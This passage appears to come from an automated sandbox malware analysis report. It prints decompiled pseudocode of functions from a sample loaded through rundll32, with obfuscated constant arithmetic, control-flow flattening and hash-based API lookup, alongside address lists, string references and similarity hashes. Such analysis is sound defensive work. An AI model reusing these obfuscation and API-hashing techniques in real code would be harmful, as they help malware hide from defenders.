												_t115 = _t115 + (_v320 & 0x0000ffff);
											}
										}
									}
								}
							}
						}
						L9:
						return _t115;
					}
					_v284 = 0x11c;
					E0044279F(_v344, _v340, _v348, _v336,  &_v284);
					_t117 =  &(_t117[3]);
					_t97 = 0x213f0da0;
					L16:
				} while (_t97 != 0x23841290);
				goto L9;
			}

0x00433faf
0x00433fb5
0x00433fc2
0x00433fc4
0x00433fc9
0x00433fd2
0x00433fdf
0x00433fe7
0x00433fef
0x00433ff7
0x00434007
0x0043400a
0x0043400e
0x00434016
0x0043401e
0x0043402e
0x00434032
0x0043403a
0x0043403f
0x00434047
0x0043404f
0x00434054
0x0043405c
0x00434064
0x00434069
0x00434072
0x00434077
0x0043407d
0x00434085
0x00434091
0x00434099
0x0043409d
0x004340a5
0x004340b2
0x004340b6
0x004340bb
0x004340c3
0x004340cb
0x004340cb
0x004340d5
0x00434166
0x00434168
0x00000000
0x004340db
0x004340e1
0x0043414f
0x0043415a
0x00000000
0x004340e3
0x004340e9
0x00434139
0x00434140
0x00000000
0x004340eb
0x004340f1
0x00434123
0x00434125
0x00000000
0x004340f3
0x004340f9
0x00434117
0x00000000
0x004340fb
0x004340fd
0x00000000
0x00434103
0x00434108
0x00434108
0x004340fd
0x004340f9
0x004340f1
0x004340e9
0x004340e1
0x0043410b
0x00434116
0x00434116
0x00434173
0x0043418c
0x00434191
0x00434194
0x00434199
0x00434199
0x00000000

Strings

K@, xrefs: 00434054
!&, xrefs: 00434032
P[, xrefs: 0043407D

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !&$K@$P[
API String ID: 0-2917137494
Opcode ID: 5b4b2cc8b968ca566717441e5ac86746a7073d49ca386277a7409c9bdfb8209a
Instruction ID: ed3040c60ed0e6b3d955657d182bb72457e213bbe553d873903fc7a56a3cbeec
Opcode Fuzzy Hash: 5b4b2cc8b968ca566717441e5ac86746a7073d49ca386277a7409c9bdfb8209a
Instruction Fuzzy Hash: 4041DB706083018BD708CF26D48906FFBE1ABD8758F14091EF592AA290D378DA4E8F97

Uniqueness

Uniqueness Score: -1.00%

Function 00173523, Relevance: 3.9, Strings: 3, Instructions: 118COMMON

Download Yara Rule

Strings

P[, xrefs: 001735F1
K@, xrefs: 001735C8
!&, xrefs: 001735A6

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !&$K@$P[
API String ID: 0-2917137494
Opcode ID: 5b4b2cc8b968ca566717441e5ac86746a7073d49ca386277a7409c9bdfb8209a
Instruction ID: e24cb4a2d18d848193d48717509b34d42af64ac59e5d4105347c30823a95790a
Opcode Fuzzy Hash: 5b4b2cc8b968ca566717441e5ac86746a7073d49ca386277a7409c9bdfb8209a
Instruction Fuzzy Hash: 94419A712093419BD718CE25D48502FFBF1ABC4758F14891EF4AAA6290D375CB4E9F93

Uniqueness

Uniqueness Score: -1.00%

Function 004335FC, Relevance: 3.9, Strings: 3, Instructions: 101
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E004335FC(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				void* _t106;
				signed int _t118;
				signed int _t119;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00442550(_t106);
				_v24 = 0x9798;
				_v24 = _v24 + 0xffffbd22;
				_v24 = _v24 + 0x641e;
				_v24 = _v24 ^ 0x0000a020;
				_v36 = 0x61df;
				_t118 = 0x59;
				_v36 = _v36 * 0x26;
				_v36 = _v36 ^ 0x000edcfe;
				_v32 = 0xcd5;
				_v32 = _v32 ^ 0xf6eb11a6;
				_v32 = _v32 ^ 0xf6eb5e3d;
				_v28 = 0x5819;
				_v28 = _v28 | 0xf42f747a;
				_v28 = _v28 ^ 0xf42f4692;
				_v48 = 0xdcf0;
				_v48 = _v48 >> 4;
				_v48 = _v48 ^ 0x00002f29;
				_v44 = 0x97e5;
				_t119 = 0x6a;
				_v44 = _v44 / _t118;
				_v44 = _v44 ^ 0x00000ed0;
				_v12 = 0xa421;
				_v12 = _v12 | 0x274c75f9;
				_v12 = _v12 + 0x5ba7;
				_v12 = _v12 << 0xa;
				_v12 = _v12 ^ 0x3546b17c;
				_v40 = 0x78dd;
				_v40 = _v40 >> 0xd;
				_v40 = _v40 ^ 0x00007b97;
				_v8 = 0xdcde;
				_v8 = _v8 | 0x90b63865;
				_v8 = _v8 + 0xeb12;
				_push(0x4313dc);
				_v8 = _v8 * 0x27;
				_v8 = _v8 ^ 0x0c047073;
				_v20 = 0xf013;
				_v20 = _v20 ^ 0x6a2eccf0;
				_v20 = _v20 << 7;
				_v20 = _v20 >> 7;
				_v20 = _v20 ^ 0x002e686d;
				_v52 = 0xca9e;
				_v52 = _v52 + 0xffffaa95;
				_v52 = _v52 ^ 0x00003a71;
				_v16 = 0x1985;
				_v16 = _v16 ^ 0x7d67dffe;
				_v16 = _v16 | 0x92ef9f7f;
				_v16 = _v16 / _t119;
				_v16 = _v16 ^ 0x026a2075;
				_push(_v28);
				_push(_v32);
				E0043A4D7(_v16, _v44, _v12, _v40, _v8, E00435DFC(_v24, _v36, _v16), _a20, _a12, __ecx);
				return E00440D6D(_v20, _v52, _v16, _t114);
			}

0x00433604
0x00433609
0x0043360c
0x0043360f
0x00433612
0x00433615
0x00433616
0x00433617
0x0043361c
0x00433625
0x0043362c
0x00433633
0x0043363a
0x00433647
0x0043364a
0x0043364d
0x00433654
0x0043365b
0x00433662
0x00433669
0x00433670
0x00433677
0x0043367e
0x00433685
0x00433689
0x00433690
0x0043369c
0x0043369d
0x004336a2
0x004336a9
0x004336b0
0x004336b7
0x004336be
0x004336c2
0x004336c9
0x004336d0
0x004336d4
0x004336db
0x004336e2
0x004336e9
0x004336f4
0x004336f9
0x004336fc
0x00433703
0x0043370a
0x00433711
0x00433715
0x00433719
0x00433720
0x00433727
0x0043372e
0x00433735
0x0043373c
0x00433743
0x0043374f
0x00433752
0x00433759
0x0043375c
0x00433783
0x004337a1

Strings

mh., xrefs: 00433719
)/, xrefs: 00433689
q:, xrefs: 0043372E

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: )/$mh.$q:
API String ID: 0-1096206879
Opcode ID: 67c9ef87deb85e0b4ec65a6422acb67d2b18a6a2470c18f0de71994703f13ae1
Instruction ID: c18c3d61135411133816e658ba3731eac9b76ebf326dd4d3d16a0fbd31790c9c
Opcode Fuzzy Hash: 67c9ef87deb85e0b4ec65a6422acb67d2b18a6a2470c18f0de71994703f13ae1
Instruction Fuzzy Hash: 73410372D0020DEBEF09CFA1C94A8DEBFB2FB08318F108159E911761A0D7B90A55DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00172B70, Relevance: 3.9, Strings: 3, Instructions: 101COMMON

Download Yara Rule

Strings

mh., xrefs: 00172C8D
)/, xrefs: 00172BFD
q:, xrefs: 00172CA2

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: )/$mh.$q:
API String ID: 0-1096206879
Opcode ID: faa8d97aed7430308da457e4245d4afb6c19da8b4dae1242b9d781458652ed5d
Instruction ID: 90453448091ec4c21d5b0a7f09027e7a2e15a54d8935cc4a25663419200ff29f
Opcode Fuzzy Hash: faa8d97aed7430308da457e4245d4afb6c19da8b4dae1242b9d781458652ed5d
Instruction Fuzzy Hash: 37410172D0020DEBEF09CFA1C94A8DEBFB2FB08314F108158E811762A0D7B90A55DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0043327F, Relevance: 3.8, Strings: 3, Instructions: 56
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E0043327F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t46;
				intOrPtr* _t56;
				signed int _t59;
				signed int _t60;
				void* _t66;

				_t66 = __ecx;
				E00442550(_t46);
				_v20 = 0x3156;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x0c55a35f;
				_v12 = 0x42ee;
				_t59 = 0x54;
				_v12 = _v12 / _t59;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x00000e02;
				_v8 = 0x7d69;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 >> 2;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00007fcf;
				_v16 = 0xcf80;
				_v16 = _v16 >> 2;
				_t60 = 0x65;
				_v16 = _v16 / _t60;
				_v16 = _v16 ^ 0x000022b9;
				_t56 = E00437378(_t60, 0x92ff481d, _t60, 0x90f109b3, 0x80);
				return  *_t56(_t66, _a4, __ecx, __edx, _a4, _a8);
			}

0x00433289
0x00433290
0x00433295
0x0043329f
0x004332a5
0x004332ac
0x004332b8
0x004332bd
0x004332c2
0x004332c6
0x004332ca
0x004332d1
0x004332d8
0x004332dc
0x004332e0
0x004332e4
0x004332eb
0x004332f2
0x004332f9
0x00433301
0x00433304
0x00433323
0x00433335

Strings

B, xrefs: 004332AC
V1, xrefs: 00433295
i}, xrefs: 004332D1

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: V1$i}$B
API String ID: 0-126001315
Opcode ID: e9ea08993b24c1a24ae5d337309e7aa82eff9c3c9ebb2c494d47034f813f44ed
Instruction ID: cfb310d1b24136cafcb6e565f3fd6a156c24d7f7e6237e75ca866a6de0edd703
Opcode Fuzzy Hash: e9ea08993b24c1a24ae5d337309e7aa82eff9c3c9ebb2c494d47034f813f44ed
Instruction Fuzzy Hash: A7112676D0020CBBEB09DFD5C90A8DEBBB1EB44708F10C089E914A7285D7B56B58CF80

Uniqueness

Uniqueness Score: -1.00%

Function 001727F3, Relevance: 3.8, Strings: 3, Instructions: 56COMMON

Download Yara Rule

Strings

i}, xrefs: 00172845
V1, xrefs: 00172809
B, xrefs: 00172820

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: V1$i}$B
API String ID: 0-126001315
Opcode ID: e53405ebcaadf61612096404f00133a13c00ecb254a195ec2e8729eab100b819
Instruction ID: 70309d8dbef212ee00d29ba1b88775e8d30098f79f84595a05f235243cf87806
Opcode Fuzzy Hash: e53405ebcaadf61612096404f00133a13c00ecb254a195ec2e8729eab100b819
Instruction Fuzzy Hash: FB111476D0060CBBEB09DFD5C80A8DEBBB5EB44708F10C089E914A7285D7B55B58CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00471E14, Relevance: 2.9, Strings: 2, Instructions: 405COMMON

Download Yara Rule

Strings

kI, xrefs: 00472018, 0047202F, 0047203A, 00472107, 00472229
d.G, xrefs: 004720C1, 004721E9

Memory Dump Source

Source File: 00000007.00000002.2331029557.0000000000453000.00000020.00020000.sdmp, Offset: 00453000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_453000_rundll32.jbxd

Similarity

API ID:
String ID: kI$d.G
API String ID: 0-3861947849
Opcode ID: 7039acd60969b2e06d97a4952306e61c0e86e2c1301d1ababd67e1d7d46c8cc3
Instruction ID: 3b419fb43f1be5384d03f1728b1af25b35ae2d0e19e9f2044933665c3c7ded03
Opcode Fuzzy Hash: 7039acd60969b2e06d97a4952306e61c0e86e2c1301d1ababd67e1d7d46c8cc3
Instruction Fuzzy Hash: 7FE14974A006099FDB10DF6AC98199EF3F5FF48304B25C5AAE908A7722D778ED41CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00444C37, Relevance: 2.7, Strings: 2, Instructions: 178
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00444C37(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t135;
				signed int _t149;
				void* _t150;
				signed int _t153;
				char _t156;
				signed int _t157;
				void* _t160;
				char* _t166;
				void* _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int* _t191;

				_push(_a8);
				_t181 = __ecx;
				_push(_a4);
				_push(0x40);
				_push(__ecx);
				E00442550(_t135);
				_v20 = 0x10;
				_t191 =  &(( &_v76)[4]);
				_v72 = 0x33a2;
				_t157 = 0;
				_t160 = 0x15bff311;
				_t182 = 0x47;
				_v72 = _v72 / _t182;
				_v72 = _v72 + 0x9922;
				_v72 = _v72 >> 4;
				_v72 = _v72 ^ 0x00004e71;
				_v52 = 0xaaa1;
				_v52 = _v52 << 9;
				_v52 = _v52 ^ 0x01552e09;
				_v76 = 0x962f;
				_v76 = _v76 << 2;
				_v76 = _v76 + 0xc5a1;
				_v76 = _v76 + 0xb22d;
				_v76 = _v76 ^ 0x0003d8ea;
				_v40 = 0xc003;
				_v40 = _v40 << 1;
				_v40 = _v40 ^ 0x0001b379;
				_v44 = 0x4990;
				_t183 = 0x43;
				_v44 = _v44 / _t183;
				_v44 = _v44 ^ 0x000010a0;
				_v48 = 0xc7fb;
				_v48 = _v48 + 0xffffc7ce;
				_v48 = _v48 ^ 0x0000a883;
				_v36 = 0x594;
				_v36 = _v36 | 0x90aa143f;
				_v36 = _v36 ^ 0x90aa6018;
				_v28 = 0x8261;
				_v28 = _v28 >> 0xc;
				_v28 = _v28 ^ 0x0000298c;
				_v32 = 0xe41c;
				_v32 = _v32 + 0xffff1d18;
				_v32 = _v32 ^ 0x00004603;
				_v68 = 0xf178;
				_v68 = _v68 ^ 0xb2146a6f;
				_v68 = _v68 << 0xd;
				_v68 = _v68 + 0xffff14e1;
				_v68 = _v68 ^ 0x9361c313;
				_v60 = 0xf75;
				_t184 = 7;
				_v60 = _v60 / _t184;
				_v60 = _v60 + 0xffffaefc;
				_v60 = _v60 ^ 0xffffe5ce;
				_v56 = 0xf098;
				_t185 = 0x29;
				_v56 = _v56 / _t185;
				_v56 = _v56 >> 0xa;
				_v56 = _v56 ^ 0x0000430d;
				_v24 = 0x878b;
				_t186 = 0x32;
				_v24 = _v24 / _t186;
				_v24 = _v24 ^ 0x000010f8;
				_v64 = 0xb5f1;
				_v64 = _v64 << 1;
				_v64 = _v64 + 0xd2ca;
				_v64 = _v64 * 0x3b;
				_v64 = _v64 ^ 0x00840c1f;
				L1:
				while(_t160 != 0xc9ebeee) {
					if(_t160 == 0x15bff311) {
						_t160 = 0xc9ebeee;
						continue;
					}
					if(_t160 == 0x185136eb) {
						_push(0x431484);
						_push(_v48);
						_t150 = E0044CF31(_v40, _v44, __eflags);
						E0043A6C9(__eflags);
						_t153 = E0044990C(_v28, __eflags, _v32, _v68, 0x40, _v60, _t181,  &_v16, _t150);
						__eflags = _t153;
						_t133 = _t153 > 0;
						__eflags = _t133;
						_t157 = 0 | _t133;
						E00440D6D(_v56, _v24, _v64, _t150);
						L22:
						return _t157;
					}
					if(_t160 != 0x2cfa89b3) {
						L19:
						__eflags = _t160 - 0x12976092;
						if(__eflags != 0) {
							continue;
						}
						goto L22;
					}
					_t166 =  &_v16;
					if(_v16 == _t157) {
						L14:
						_t160 = 0x185136eb;
						continue;
					} else {
						goto L6;
					}
					do {
						L6:
						_t156 =  *_t166;
						if(_t156 < 0x30 || _t156 > 0x39) {
							if(_t156 < 0x61 || _t156 > 0x7a) {
								if(_t156 < 0x41 || _t156 > 0x5a) {
									 *_t166 = 0x58;
								}
							}
						}
						_t166 = _t166 + 1;
					} while ( *_t166 != _t157);
					goto L14;
				}
				_t149 = E0044226D( &_v20, _v72, _v52, _v76,  &_v16);
				_t191 =  &(_t191[3]);
				__eflags = _t149;
				if(__eflags == 0) {
					_t160 = 0x12976092;
					goto L19;
				}
				_t160 = 0x2cfa89b3;
				goto L1;
			}

0x00444c3e
0x00444c42
0x00444c44
0x00444c48
0x00444c4a
0x00444c4b
0x00444c50
0x00444c58
0x00444c5b
0x00444c69
0x00444c6b
0x00444c72
0x00444c77
0x00444c7d
0x00444c85
0x00444c8a
0x00444c92
0x00444c9a
0x00444c9f
0x00444ca7
0x00444caf
0x00444cb4
0x00444cbc
0x00444cc4
0x00444ccc
0x00444cd4
0x00444cd8
0x00444ce0
0x00444cec
0x00444cf1
0x00444cf7
0x00444cff
0x00444d07
0x00444d0f
0x00444d17
0x00444d1f
0x00444d27
0x00444d2f
0x00444d37
0x00444d3c
0x00444d44
0x00444d4c
0x00444d54
0x00444d5c
0x00444d64
0x00444d6c
0x00444d71
0x00444d79
0x00444d81
0x00444d8d
0x00444d92
0x00444d98
0x00444da0
0x00444da8
0x00444db4
0x00444db7
0x00444dbb
0x00444dc0
0x00444dca
0x00444dd8
0x00444de5
0x00444de9
0x00444df1
0x00444df9
0x00444dfd
0x00444e0a
0x00444e0e
0x00000000
0x00444e16
0x00444e20
0x00444e5e
0x00000000
0x00444e5e
0x00444e24
0x00444e9d
0x00444ea2
0x00444eae
0x00444eb9
0x00444ed9
0x00444ee0
0x00444eeb
0x00444eeb
0x00444eeb
0x00444ef2
0x00444efd
0x00444f03
0x00444f03
0x00444e2c
0x00444e8f
0x00444e8f
0x00444e95
0x00000000
0x00000000
0x00000000
0x00444e9b
0x00444e2e
0x00444e36
0x00444e5a
0x00444e5a
0x00000000
0x00000000
0x00000000
0x00000000
0x00444e38
0x00444e38
0x00444e38
0x00444e3c
0x00444e44
0x00444e4c
0x00444e52
0x00444e52
0x00444e4c
0x00444e44
0x00444e55
0x00444e56
0x00000000
0x00444e38
0x00444e77
0x00444e7c
0x00444e7f
0x00444e81
0x00444e8a
0x00000000
0x00444e8a
0x00444e83
0x00000000

Strings

C, xrefs: 00444DC0
qN, xrefs: 00444C8A

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: C$qN
API String ID: 0-790040163
Opcode ID: 6581ff3e9333b0e9792f401114729395e28326a476a091d51a313b01e8bf1eed
Instruction ID: 54fcd947334c8a558156fd59efa5b0edb74aa1b4de534dd58f9808ea1f5aa8ec
Opcode Fuzzy Hash: 6581ff3e9333b0e9792f401114729395e28326a476a091d51a313b01e8bf1eed
Instruction Fuzzy Hash: DD7174715093019FE354CF26C58961FBBE1BBC5B18F90481EF195862A0D7B9CA0ACF87

Uniqueness

Uniqueness Score: -1.00%

Function 001841AB, Relevance: 2.7, Strings: 2, Instructions: 178COMMON

Download Yara Rule

Strings

qN, xrefs: 001841FE
C, xrefs: 00184334

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: C$qN
API String ID: 0-790040163
Opcode ID: 3664b42d23cba470b360c6ad181b5cbbd14683b7db110bcae712de3154e60996
Instruction ID: 5959d7b0374a1ecb2e87322c19239cd58f8ee89a38b5607cfbca0950aa581983
Opcode Fuzzy Hash: 3664b42d23cba470b360c6ad181b5cbbd14683b7db110bcae712de3154e60996
Instruction Fuzzy Hash: B27174715083429FE354EF26C98955FBBE1FBC5B08F40991CF591862A0DBB58A0ACF83

Uniqueness

Uniqueness Score: -1.00%

Function 004357D4, Relevance: 2.7, Strings: 2, Instructions: 161
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E004357D4(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* __ecx;
				void* _t131;
				intOrPtr _t147;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				void* _t159;
				intOrPtr* _t177;
				void* _t179;
				void* _t180;

				_t177 = _a4;
				_t176 = _a16;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_t177);
				_push(__edx);
				E00442550(_t131);
				_v80 = 0x4cb2ed;
				_v76 = 0;
				_t180 = _t179 + 0x18;
				_v72 = 0;
				_v108 = 0x9c5c;
				_t159 = 0x3368839;
				_v108 = _v108 ^ 0xd3e57123;
				_v108 = _v108 ^ 0x4ad8fda9;
				_v108 = _v108 ^ 0x993d5beb;
				_v88 = 0xf9a5;
				_v88 = _v88 >> 0x10;
				_v88 = _v88 ^ 0x0000103e;
				_v120 = 0xbbb7;
				_t154 = 0x79;
				_v120 = _v120 / _t154;
				_v120 = _v120 + 0xffffc937;
				_v120 = _v120 ^ 0xd13f0730;
				_v120 = _v120 ^ 0x2ec0cb4d;
				_v104 = 0xc6c8;
				_v104 = _v104 | 0xbfb93240;
				_v104 = _v104 << 8;
				_v104 = _v104 ^ 0xb9f6c47b;
				_v124 = 0xc4b4;
				_v124 = _v124 + 0x286;
				_t155 = 0x5f;
				_v124 = _v124 * 0xf;
				_v124 = _v124 + 0x3b2;
				_v124 = _v124 ^ 0x000bab89;
				_v128 = 0xc484;
				_v128 = _v128 + 0xba23;
				_v128 = _v128 >> 4;
				_v128 = _v128 | 0x65c5919c;
				_v128 = _v128 ^ 0x65c5d8de;
				_v100 = 0x428;
				_v100 = _v100 << 6;
				_v100 = _v100 << 0xe;
				_v100 = _v100 ^ 0x4280342d;
				_v116 = 0x3c02;
				_v116 = _v116 << 4;
				_v116 = _v116 / _t155;
				_t156 = 0x15;
				_v116 = _v116 / _t156;
				_v116 = _v116 ^ 0x000042c4;
				_v84 = 0x30d9;
				_v84 = _v84 ^ 0x97ed8beb;
				_v84 = _v84 ^ 0x97eda4f0;
				_v92 = 0x87d4;
				_v92 = _v92 + 0xffff3816;
				_v92 = _v92 << 6;
				_v92 = _v92 ^ 0xffefeeaa;
				_v96 = 0xe0b5;
				_v96 = _v96 * 0x4f;
				_v96 = _v96 + 0xffff6770;
				_v96 = _v96 ^ 0x0044a5e8;
				_v112 = 0x5d17;
				_v112 = _v112 ^ 0xac640b72;
				_v112 = _v112 + 0xffff1fa4;
				_v112 = _v112 << 7;
				_v112 = _v112 ^ 0x31bb0480;
				do {
					while(_t159 != 0x3368839) {
						if(_t159 == 0x227ced25) {
							E0043F834( *_t176, _v100,  &_v68, _v116);
							_t180 = _t180 + 8;
							_t159 = 0x333b911b;
							continue;
						} else {
							if(_t159 == 0x240f0f59) {
								E0043FEE3(_t177,  &_v68, _v120, _v104, _v124, _v128);
								_t180 = _t180 + 0x10;
								_t159 = 0x227ced25;
								continue;
							} else {
								if(_t159 == 0x25527f2b) {
									_push(_t159);
									_t147 = E004354FB( *(_t177 + 4));
									 *_t177 = _t147;
									__eflags = _t147;
									if(__eflags != 0) {
										_t159 = 0x240f0f59;
										continue;
									}
								} else {
									if(_t159 == 0x303334f6) {
										 *(_t177 + 4) = E00440672(_t176);
										_t159 = 0x25527f2b;
										continue;
									} else {
										_t188 = _t159 - 0x333b911b;
										if(_t159 != 0x333b911b) {
											goto L15;
										} else {
											E0043BAD2(_v84, _v92, _t188, _t176 + 4,  &_v68, _v96);
										}
									}
								}
							}
						}
						L8:
						return 0 |  *_t177 != 0x00000000;
					}
					_t159 = 0x303334f6;
					 *_t177 = 0;
					 *(_t177 + 4) = _v112;
					L15:
					__eflags = _t159 - 0x19576d5a;
				} while (__eflags != 0);
				goto L8;
			}

0x004357dd
0x004357e5
0x004357ec
0x004357ed
0x004357f4
0x004357fb
0x004357fc
0x004357fe
0x00435803
0x0043580d
0x00435811
0x00435814
0x0043581a
0x00435822
0x00435827
0x0043582f
0x00435837
0x0043583f
0x00435847
0x0043584c
0x00435854
0x00435862
0x00435867
0x0043586d
0x00435875
0x0043587d
0x00435885
0x0043588d
0x00435895
0x0043589a
0x004358a2
0x004358aa
0x004358b7
0x004358ba
0x004358be
0x004358c6
0x004358ce
0x004358d6
0x004358de
0x004358e3
0x004358eb
0x004358f3
0x004358fb
0x00435900
0x00435905
0x0043590d
0x00435915
0x00435922
0x0043592a
0x0043592d
0x00435931
0x00435939
0x00435941
0x00435949
0x00435951
0x00435959
0x00435961
0x00435966
0x0043596e
0x0043597b
0x0043597f
0x00435987
0x00435994
0x0043599c
0x004359a4
0x004359ac
0x004359b1
0x004359b9
0x004359b9
0x004359cb
0x00435a87
0x00435a8c
0x00435a8f
0x00000000
0x004359d1
0x004359d3
0x00435a66
0x00435a6b
0x00435a6e
0x00000000
0x004359d5
0x004359db
0x00435a3c
0x00435a3d
0x00435a42
0x00435a45
0x00435a47
0x00435a49
0x00000000
0x00435a49
0x004359dd
0x004359e3
0x00435a27
0x00435a2a
0x00000000
0x004359e5
0x004359e5
0x004359eb
0x00000000
0x004359f1
0x00435a06
0x00435a0b
0x004359eb
0x004359e3
0x004359db
0x004359d3
0x00435a0f
0x00435a1f
0x00435a1f
0x00435a9d
0x00435aa2
0x00435aa4
0x00435aa7
0x00435aa7
0x00435aa7
0x00000000

Strings

%|", xrefs: 00435A6E
%|", xrefs: 004359C5

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: %|"$%|"
API String ID: 0-2582732878
Opcode ID: 60e29652dc2165e8f256d14fa822249d67059f5fe67010c7fe92581947bf8306
Instruction ID: 22016425f2d977a8043bf1061b7c5fcb78dbba04bafef3549a28b97a878f7b1c
Opcode Fuzzy Hash: 60e29652dc2165e8f256d14fa822249d67059f5fe67010c7fe92581947bf8306
Instruction Fuzzy Hash: 547164711093419FD398DF25C98991FBBF0BBC8718F40AA1EF1C696260C7B88A49CF46

Uniqueness

Uniqueness Score: -1.00%

Function 00174D48, Relevance: 2.7, Strings: 2, Instructions: 161COMMON

Download Yara Rule

Strings

%|", xrefs: 00174FE2
%|", xrefs: 00174F39

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: %|"$%|"
API String ID: 0-2582732878
Opcode ID: dcf0d0cf0a998f2391e1bfd2c442f01b02ad6d522a666d75066037e3d3353ea2
Instruction ID: d063b101407ab0a8e32ac14491fe7dc2fbeefe2cfc806a7cb5ba3878ca32fd6f
Opcode Fuzzy Hash: dcf0d0cf0a998f2391e1bfd2c442f01b02ad6d522a666d75066037e3d3353ea2
Instruction Fuzzy Hash: DF7162711093019FD7A8CF25C98981FBBF1BBC8718F509A1DF1DA96260C7B89A09CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00432208, Relevance: 2.6, Strings: 2, Instructions: 126
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00432208(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v332;
				char _t130;
				void* _t131;
				void* _t135;
				signed int _t137;
				signed int _t138;
